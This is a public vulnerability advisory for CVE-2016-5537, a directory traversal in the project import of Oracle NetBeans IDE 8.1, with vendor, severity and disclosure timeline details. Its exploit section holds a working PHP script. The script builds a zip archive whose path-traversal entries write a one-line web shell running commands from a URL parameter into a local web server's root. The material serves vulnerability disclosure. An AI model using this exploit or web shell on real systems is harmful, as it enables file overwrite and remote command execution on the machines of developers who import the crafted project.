Oracle Netbeans IDE 8.1 - Directory Traversal

[+] Credits: John Page aka hyp3rlinx	

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/ORACLE-NETBEANS-IDE-DIRECTORY-TRAVERSAL.txt

[+] ISR: ApparitionSec



Vendor:
===============
www.oracle.com



Product:
=================
Netbeans IDE v8.1



Vulnerability Type:
=========================
Import Directory Traversal  



CVE Reference:
==============
CVE-2016-5537



Vulnerability Details:
=====================

This was part of Oracle Critical Patch Update for October 2016.

Vulnerability in the NetBeans component of Oracle Fusion Middleware (subcomponent: Project Import).
The supported version that is affected is 8.1. Easily exploitable vulnerability allows high privileged attacker with logon
to the infrastructure where NetBeans executes to compromise NetBeans. While the vulnerability is in NetBeans, attacks may significantly
impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some
of NetBeans accessible data as well as unauthorized read access to a subset of NetBeans accessible data and unauthorized ability to cause
a partial denial of service (partial DOS) of NetBeans. 

Vulnerability in way Netbeans processes  ".zip" archives to be imported as project. If a user imports a malicious project 
containing "../" characters the import will fail, yet still process the "../".  we can then place malicious scripts outside of
the target directory and inside web root if user is running a local server etc...

It may be possible to then execute remote commands on the affected system by later visiting the URL and access our script if that
web server is public facing, if it is not then it may still be subject to abuse internally by internal malicious users. Moreover,
it is also possible to overwrite files on the system hosting vulnerable versions of NetBeans IDE.


References:
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixFMW


Exploit Code(s):
=================

<?php
 #archive path traversal
 #target xampp htdocs as POC
 #by hyp3rlinx
 #===============================
 if($argc<4){echo "Usage: <zip name>, <path depth>, <RCE.php as default? Y/[file]>";exit();}
 $zipname=$argv[1];
 $exploit_file="RCE.php";
 $cmd='<?php exec($_GET["cmd"]); ?>';
 if(!empty($argv[2])&&is_numeric($argv[2])){
 $depth=$argv[2];
 }else{
 echo "Second flag <path depth> must be numeric!, you supplied '$argv[2]'";
 exit();
 }
 if(strtolower($argv[3])!="y"){
 if(!empty($argv[3])){
 $exploit_file=$argv[3];
 }
 if(!empty($argv[4])){
 $cmd=$argv[4];
 }else{
 echo "Usage: enter a payload for file $exploit_file wrapped in double
 quotes";
 exit();
 }
 }
 $zip = new ZipArchive();
 $res = $zip->open("$zipname.zip", ZipArchive::CREATE);
 $zip->addFromString(str_repeat("..\\",
 $depth)."\\xampp\\htdocs\\".$exploit_file, $cmd);
 $zip->close();
 echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";
 echo "================ hyp3rlinx ===================";
?>


Disclosure Timeline:
=======================================
Vendor Notification: September 20, 2016
October 20, 2016 : Public Disclosure



Exploitation Technique:
=======================
Local



Severity Level:
=====================
CVSS VERSION 3.0 RISK 
5.7



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx